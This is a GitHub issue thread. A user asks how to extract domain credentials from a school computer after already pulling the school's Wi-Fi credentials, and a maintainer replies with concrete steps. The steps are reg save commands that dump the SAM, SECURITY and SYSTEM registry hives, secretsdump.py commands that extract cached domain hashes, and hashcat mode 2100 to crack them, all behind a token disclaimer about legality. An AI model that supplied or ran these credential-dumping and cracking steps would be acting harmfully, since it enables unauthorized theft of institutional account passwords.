ash47
commented
1 year ago Hi,
(I'll assume this is legal and for educational purposes, etc, etc)
The older the version of windows, the better your chances of success.
You're getting into the realm of pen testing now.
Domain credentials are stored in SAM / SECURITY/ SYSTEM files.
You can dump those files with an elevated command prompt:
reg save HKLM\SAM "C:\Windows\Temp\sam.save" reg save HKLM\SECURITY "C:\Windows\Temp\security.save" reg save HKLM\SYSTEM "C:\Windows\Temp\system.save"
Copy those files off the PC, those contain the cached domain credentials, you'll need to extract them and then crack them.
Offline dumping of LSA secrets from exported hives
secretsdump.py -security '/path/to/security.save' -system '/path/to/system.save' LOCAL
Offline dumping of SAM secrets from exported hives
secretsdump.py -sam '/path/to/sam.save' -system '/path/to/system.save' LOCAL
Offline dumping of SAM & LSA secrets from exported hives
secretsdump.py -sam '/path/to/sam.save' -security '/path/to/security.save' -system '/path/to/system.save' LOCAL
Secrets dump script: https://github.com/fortra/impacket/blob/master/examples/secretsdump.py
You're looking for something like
$DCC2$10240#user#_hash_here
In the LSA secrets, the same secrets will be local account hashes.
You want to crack the hash with mode 2100 with hashcat:
https://hashcat.net/wiki/doku.php?id=example_hashes
There's enough info here to Google the rest.
Best of luck with your legal and educational projects.
On Thu, 23 Nov 2023, 12:23 am Ardumine, @.***> wrote:
Hi! First of all, I'm really happy for this project to exist! I was able to use this in my laptop and i got the school Wi-Fi auth with no problem! But there is just one thing. How can i use this instead of a Wi-Fi connection, with an ethernet connection? What I'm trying to say is that this program gets the credentials from the Wi-Fi saved on the laptop, but i need it to get the credentials on an ethernet connection, in this case a school computer where i have Admin access. Is this possible?
Thanks, and sorry for my bad English :)
— Reply to this email directly, view it on GitHub https://github.com/ash47/EnterpriseWifiPasswordRecover/issues/16, or unsubscribe https://github.com/notifications/unsubscribe-auth/AA4UUDXMMY2BLMBRII5HQRTYFX4EDAVCNFSM6AAAAAA7WHNOPSVHI2DSMVQWIX3LMV43ASLTON2WKOZSGAYDMMZTGQ2TOOA . You are receiving this because you are subscribed to this thread.Message ID: @.***>
Ardumine
Hi! First of all, I'm really happy for this project to exist! I was able to use this in my laptop and i got the school Wi-Fi auth with no problem! But there is just one thing. How can i use this instead of a Wi-Fi connection, with an ethernet connection? What I'm trying to say is that this program gets the credentials from the Wi-Fi saved on the laptop, but i need it to get the credentials on an ethernet connection, in this case a school computer where i have Admin access. Is this possible?
Thanks, and sorry for my bad English :)